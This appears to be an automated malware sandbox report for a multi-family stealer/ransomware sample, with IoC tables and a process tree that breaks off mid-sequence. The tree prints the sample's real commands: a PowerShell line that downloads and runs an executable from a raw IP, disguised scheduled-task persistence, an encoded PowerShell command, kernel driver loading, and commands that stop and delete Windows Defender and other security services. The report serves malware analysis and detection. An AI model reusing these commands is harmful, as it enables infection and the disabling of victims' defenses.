1020	MSBuild.exe
1020	MSBuild.exe
1020	MSBuild.exe
1020	MSBuild.exe
2676	Rm3cVPI.exe
2676	Rm3cVPI.exe
2676	Rm3cVPI.exe
2676	Rm3cVPI.exe
6112	msiexec.exe
6112	msiexec.exe
1520	Abspawnhlp.exe
5896	Abspawnhlp.exe
5896	Abspawnhlp.exe
5896	Abspawnhlp.exe
5896	Abspawnhlp.exe
5896	Abspawnhlp.exe
5896	Abspawnhlp.exe
4856	Abspawnhlp.exe
4856	Abspawnhlp.exe
4856	Abspawnhlp.exe
4856	Abspawnhlp.exe
4856	Abspawnhlp.exe
4856	Abspawnhlp.exe
4160	cmd.exe
4160	cmd.exe
4160	cmd.exe
3312	powershell.exe
3312	powershell.exe
3312	powershell.exe
1908	Passwords.com
1908	Passwords.com
1908	Passwords.com
1908	Passwords.com
1908	Passwords.com
1908	Passwords.com
2104	MSBuild.exe
2104	MSBuild.exe
2104	MSBuild.exe
2104	MSBuild.exe
6244	MSBuild.exe
6244	MSBuild.exe
6244	MSBuild.exe
6244	MSBuild.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
652	Process not Found
652	Process not Found
6076	8c6895b6.exe
6076	8c6895b6.exe
6076	8c6895b6.exe
6076	8c6895b6.exe

Suspicious behavior: MapViewOfSection 21 IoCs

pid	Process
3692	Abspawnhlp.exe
3692	Abspawnhlp.exe
3692	Abspawnhlp.exe
3888	p3hx1_003.exe
3888	p3hx1_003.exe
3888	p3hx1_003.exe
5896	Abspawnhlp.exe
5896	Abspawnhlp.exe
4856	Abspawnhlp.exe
4856	Abspawnhlp.exe
3004	CamMenuMaker.exe
5896	Abspawnhlp.exe
4856	Abspawnhlp.exe
4600	CamMenuMaker.exe
3004	CamMenuMaker.exe
8988	Abspawnhlp.exe
8988	Abspawnhlp.exe
4600	CamMenuMaker.exe
7772	Abspawnhlp.exe
7772	Abspawnhlp.exe
8988	Abspawnhlp.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1448	powershell.exe
Token: SeDebugPrivilege	4596	NHq7LaU.exe
Token: SeDebugPrivilege	3156	chrome.exe
Token: SeDebugPrivilege	2996	NHq7LaU.exe
Token: SeShutdownPrivilege	208	msiexec.exe
Token: SeIncreaseQuotaPrivilege	208	msiexec.exe
Token: SeSecurityPrivilege	6112	msiexec.exe
Token: SeCreateTokenPrivilege	208	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	208	msiexec.exe
Token: SeLockMemoryPrivilege	208	msiexec.exe
Token: SeIncreaseQuotaPrivilege	208	msiexec.exe
Token: SeMachineAccountPrivilege	208	msiexec.exe
Token: SeTcbPrivilege	208	msiexec.exe
Token: SeSecurityPrivilege	208	msiexec.exe
Token: SeTakeOwnershipPrivilege	208	msiexec.exe
Token: SeLoadDriverPrivilege	208	msiexec.exe
Token: SeSystemProfilePrivilege	208	msiexec.exe
Token: SeSystemtimePrivilege	208	msiexec.exe
Token: SeProfSingleProcessPrivilege	208	msiexec.exe
Token: SeIncBasePriorityPrivilege	208	msiexec.exe
Token: SeCreatePagefilePrivilege	208	msiexec.exe
Token: SeCreatePermanentPrivilege	208	msiexec.exe
Token: SeBackupPrivilege	208	msiexec.exe
Token: SeRestorePrivilege	208	msiexec.exe
Token: SeShutdownPrivilege	208	msiexec.exe
Token: SeDebugPrivilege	208	msiexec.exe
Token: SeAuditPrivilege	208	msiexec.exe
Token: SeSystemEnvironmentPrivilege	208	msiexec.exe
Token: SeChangeNotifyPrivilege	208	msiexec.exe
Token: SeRemoteShutdownPrivilege	208	msiexec.exe
Token: SeUndockPrivilege	208	msiexec.exe
Token: SeSyncAgentPrivilege	208	msiexec.exe
Token: SeEnableDelegationPrivilege	208	msiexec.exe
Token: SeManageVolumePrivilege	208	msiexec.exe
Token: SeImpersonatePrivilege	208	msiexec.exe
Token: SeCreateGlobalPrivilege	208	msiexec.exe
Token: SeRestorePrivilege	6112	msiexec.exe
Token: SeTakeOwnershipPrivilege	6112	msiexec.exe
Token: SeRestorePrivilege	6112	msiexec.exe
Token: SeTakeOwnershipPrivilege	6112	msiexec.exe
Token: SeRestorePrivilege	6112	msiexec.exe
Token: SeTakeOwnershipPrivilege	6112	msiexec.exe
Token: SeRestorePrivilege	6112	msiexec.exe
Token: SeTakeOwnershipPrivilege	6112	msiexec.exe
Token: SeRestorePrivilege	6112	msiexec.exe
Token: SeTakeOwnershipPrivilege	6112	msiexec.exe
Token: SeRestorePrivilege	6112	msiexec.exe
Token: SeTakeOwnershipPrivilege	6112	msiexec.exe
Token: SeRestorePrivilege	6112	msiexec.exe
Token: SeTakeOwnershipPrivilege	6112	msiexec.exe
Token: SeRestorePrivilege	6112	msiexec.exe
Token: SeTakeOwnershipPrivilege	6112	msiexec.exe
Token: SeRestorePrivilege	6112	msiexec.exe
Token: SeTakeOwnershipPrivilege	6112	msiexec.exe
Token: SeRestorePrivilege	6112	msiexec.exe
Token: SeTakeOwnershipPrivilege	6112	msiexec.exe
Token: SeRestorePrivilege	6112	msiexec.exe
Token: SeTakeOwnershipPrivilege	6112	msiexec.exe
Token: SeRestorePrivilege	6112	msiexec.exe
Token: SeTakeOwnershipPrivilege	6112	msiexec.exe
Token: SeRestorePrivilege	6112	msiexec.exe
Token: SeTakeOwnershipPrivilege	6112	msiexec.exe
Token: SeRestorePrivilege	6112	msiexec.exe
Token: SeTakeOwnershipPrivilege	6112	msiexec.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
3156	2025-04-01_af6e3955b2d8c162d211d43ff6d72231_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3156	2025-04-01_af6e3955b2d8c162d211d43ff6d72231_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3156	2025-04-01_af6e3955b2d8c162d211d43ff6d72231_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1908	Passwords.com
1908	Passwords.com
1908	Passwords.com

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
3156	2025-04-01_af6e3955b2d8c162d211d43ff6d72231_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3156	2025-04-01_af6e3955b2d8c162d211d43ff6d72231_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
3156	2025-04-01_af6e3955b2d8c162d211d43ff6d72231_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
1908	Passwords.com
1908	Passwords.com
1908	Passwords.com

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3156	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3156 wrote to memory of 1476	3156	2025-04-01_af6e3955b2d8c162d211d43ff6d72231_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 3156 wrote to memory of 1476	3156	2025-04-01_af6e3955b2d8c162d211d43ff6d72231_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 3156 wrote to memory of 1476	3156	2025-04-01_af6e3955b2d8c162d211d43ff6d72231_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	88
PID 3156 wrote to memory of 6104	3156	2025-04-01_af6e3955b2d8c162d211d43ff6d72231_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 3156 wrote to memory of 6104	3156	2025-04-01_af6e3955b2d8c162d211d43ff6d72231_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 3156 wrote to memory of 6104	3156	2025-04-01_af6e3955b2d8c162d211d43ff6d72231_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	89
PID 1476 wrote to memory of 5576	1476	cmd.exe	91
PID 1476 wrote to memory of 5576	1476	cmd.exe	91
PID 1476 wrote to memory of 5576	1476	cmd.exe	91
PID 6104 wrote to memory of 1448	6104	mshta.exe	92
PID 6104 wrote to memory of 1448	6104	mshta.exe	92
PID 6104 wrote to memory of 1448	6104	mshta.exe	92
PID 1448 wrote to memory of 5032	1448	powershell.exe	101
PID 1448 wrote to memory of 5032	1448	powershell.exe	101
PID 1448 wrote to memory of 5032	1448	powershell.exe	101
PID 5032 wrote to memory of 4828	5032	TempQXO5GGPXMOMIFNHLOX1OEN7KVVB1EZJH.EXE	102
PID 5032 wrote to memory of 4828	5032	TempQXO5GGPXMOMIFNHLOX1OEN7KVVB1EZJH.EXE	102
PID 5032 wrote to memory of 4828	5032	TempQXO5GGPXMOMIFNHLOX1OEN7KVVB1EZJH.EXE	102
PID 4828 wrote to memory of 116	4828	rapes.exe	106
PID 4828 wrote to memory of 116	4828	rapes.exe	106
PID 4828 wrote to memory of 116	4828	rapes.exe	106
PID 116 wrote to memory of 3204	116	PQPYAYJJ.exe	107
PID 116 wrote to memory of 3204	116	PQPYAYJJ.exe	107
PID 116 wrote to memory of 3204	116	PQPYAYJJ.exe	107
PID 3204 wrote to memory of 3692	3204	Abspawnhlp.exe	108
PID 3204 wrote to memory of 3692	3204	Abspawnhlp.exe	108
PID 3204 wrote to memory of 3692	3204	Abspawnhlp.exe	108
PID 4828 wrote to memory of 5744	4828	rapes.exe	109
PID 4828 wrote to memory of 5744	4828	rapes.exe	109
PID 5744 wrote to memory of 5436	5744	h8NlU62.exe	110
PID 5744 wrote to memory of 5436	5744	h8NlU62.exe	110
PID 5744 wrote to memory of 5436	5744	h8NlU62.exe	110
PID 5744 wrote to memory of 5436	5744	h8NlU62.exe	110
PID 5744 wrote to memory of 5436	5744	h8NlU62.exe	110
PID 5744 wrote to memory of 5436	5744	h8NlU62.exe	110
PID 5744 wrote to memory of 5436	5744	h8NlU62.exe	110
PID 5744 wrote to memory of 5436	5744	h8NlU62.exe	110
PID 5744 wrote to memory of 5436	5744	h8NlU62.exe	110
PID 4828 wrote to memory of 4596	4828	rapes.exe	112
PID 4828 wrote to memory of 4596	4828	rapes.exe	112
PID 3692 wrote to memory of 5152	3692	Abspawnhlp.exe	113
PID 3692 wrote to memory of 5152	3692	Abspawnhlp.exe	113
PID 3692 wrote to memory of 5152	3692	Abspawnhlp.exe	113
PID 4596 wrote to memory of 6056	4596	NHq7LaU.exe	114
PID 4596 wrote to memory of 6056	4596	NHq7LaU.exe	114
PID 4596 wrote to memory of 3156	4596	NHq7LaU.exe	116
PID 4596 wrote to memory of 3156	4596	NHq7LaU.exe	116
PID 3156 wrote to memory of 2244	3156	chrome.exe	117
PID 3156 wrote to memory of 2244	3156	chrome.exe	117
PID 3692 wrote to memory of 5152	3692	Abspawnhlp.exe	113
PID 3692 wrote to memory of 5152	3692	Abspawnhlp.exe	113
PID 4828 wrote to memory of 5792	4828	rapes.exe	120
PID 4828 wrote to memory of 5792	4828	rapes.exe	120
PID 5792 wrote to memory of 2628	5792	qWR3lUj.exe	121
PID 5792 wrote to memory of 2628	5792	qWR3lUj.exe	121
PID 5792 wrote to memory of 2628	5792	qWR3lUj.exe	121
PID 5792 wrote to memory of 2628	5792	qWR3lUj.exe	121
PID 5792 wrote to memory of 2628	5792	qWR3lUj.exe	121
PID 5792 wrote to memory of 2628	5792	qWR3lUj.exe	121
PID 5792 wrote to memory of 2628	5792	qWR3lUj.exe	121
PID 5792 wrote to memory of 2628	5792	qWR3lUj.exe	121
PID 5792 wrote to memory of 2628	5792	qWR3lUj.exe	121
PID 4828 wrote to memory of 3864	4828	rapes.exe	124
PID 4828 wrote to memory of 3864	4828	rapes.exe	124

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2732
- C:\Windows\SysWOW64\fontdrvhost.exe
  "C:\Windows\System32\fontdrvhost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:7404
- C:\Windows\SysWOW64\fontdrvhost.exe
  "C:\Windows\System32\fontdrvhost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:10156

C:\Users\Admin\AppData\Local\Temp\2025-04-01_af6e3955b2d8c162d211d43ff6d72231_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-01_af6e3955b2d8c162d211d43ff6d72231_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3156
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn bIUtumaM0Hh /tr "mshta C:\Users\Admin\AppData\Local\Temp\PPsCIeqxQ.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1476
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn bIUtumaM0Hh /tr "mshta C:\Users\Admin\AppData\Local\Temp\PPsCIeqxQ.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:5576
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\PPsCIeqxQ.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:6104
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QXO5GGPXMOMIFNHLOX1OEN7KVVB1EZJH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1448
  - - C:\Users\Admin\AppData\Local\TempQXO5GGPXMOMIFNHLOX1OEN7KVVB1EZJH.EXE
      "C:\Users\Admin\AppData\Local\TempQXO5GGPXMOMIFNHLOX1OEN7KVVB1EZJH.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5032
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4828
      - C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10404930101\PQPYAYJJ.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:116
        
        C:\Users\Admin\Abspawnhlp.exe
        
        "C:\Users\Admin\Abspawnhlp.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3204
        
        C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
        
        C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:3692
        
        C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
        
        C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
        9⤵
        Downloads MZ/PE file
        Checks computer location settings
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Modifies registry class
        
        PID:5152
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000910271\FRDKTUCO.msi" /quiet
        10⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:208
        
        C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000920101\LXUZVRLG.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5792
        
        C:\Users\Admin\Abspawnhlp.exe
        
        "C:\Users\Admin\Abspawnhlp.exe"
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:4856
        
        C:\Users\Admin\Abspawnhlp.exe
        
        C:\Users\Admin\Abspawnhlp.exe
        12⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:5440
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 460
        13⤵
        Program crash
        
        PID:6404
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        12⤵
        System Location Discovery: System Language Discovery
        
        PID:6700
        
        C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000930101\890172171_x64.exe"
        10⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:3428
        
        C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
        
        "C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe"
        10⤵
        Executes dropped EXE
        
        PID:6192
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6192 -s 80
        11⤵
        Program crash
        
        PID:6468
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10000970271\NBFRPMVB.msi" /quiet
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:7144
        
        C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000980101\IEYKSCXV.exe"
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:7708
        
        C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10000991101\KRWXARXD.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:8080
        
        C:\Users\Admin\CamMenuMaker.exe
        
        "C:\Users\Admin\CamMenuMaker.exe"
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:4600
        
        C:\Users\Admin\CamMenuMaker.exe
        
        C:\Users\Admin\CamMenuMaker.exe
        12⤵
        Loads dropped DLL
        Suspicious behavior: AddClipboardFormatListener
        
        PID:9724
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Enc UgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAJwB3AGkAdwBlAHIANwAuADUALgBlAHgAZQAnACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAdwBpAHcAZQByADcALgA1AC4AZQB4AGUAJwApACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0ATwBuAGMAZQAgAC0AQQB0ACAAKABHAGUAdAAtAEQAYQB0AGUAKQAgAC0AUgBlAHAAZQB0AGkAdABpAG8AbgBJAG4AdABlAHIAdgBhAGwAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBNAGkAbgB1AHQAZQBzACAANQApACkAIAAtAFUAcwBlAHIAIAAkAGUAbgB2ADoAVQBzAGUAcgBOAGEAbQBlACAALQBSAHUAbgBMAGUAdgBlAGwAIABIAGkAZwBoAGUAcwB0ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0AUwBlAGMAbwBuAGQAcwAgADAAKQAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAKQAgAC0ARgBvAHIAYwBlAA==
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:8624
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        12⤵
        Drops file in Windows directory
        
        PID:11232
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        9⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4160
      - C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10405770101\h8NlU62.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:5744
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5436
      - C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10405830101\NHq7LaU.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4596
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6056
        
        C:\ProgramData\Google\Chrome\chrome.exe
        
        "C:\ProgramData\Google\Chrome\chrome.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3156
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "GoogleChrome" /sc ONLOGON /tr "C:\ProgramData\Google\Chrome\chrome.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2244
      - C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10405940101\qWR3lUj.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:5792
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2628
      - C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10407580101\HAe88WC.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3864
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:6028
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1020
      - C:\Users\Admin\AppData\Local\Temp\10407870101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10407870101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:6032
        
        C:\Users\Admin\AppData\Local\Temp\261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\261.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4964
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\274A.tmp\274B.tmp\274C.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
        8⤵
        
        PID:116
        
        C:\Users\Admin\AppData\Local\Temp\261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\261.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2824
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\28E0.tmp\28E1.tmp\28E2.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
        10⤵
        Drops file in Program Files directory
        
        PID:4700
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:1592
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:5744
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:4472
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:1392
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:2032
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:5436
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2432
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:2988
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:2116
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:3472
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:2044
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:3996
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:2464
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:5452
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:4684
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:5424
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:2340
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:3964
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:868
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:4632
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:2288
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:5824
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:2976
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:4500
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:4416
        
        C:\Windows\system32\sc.exe
        
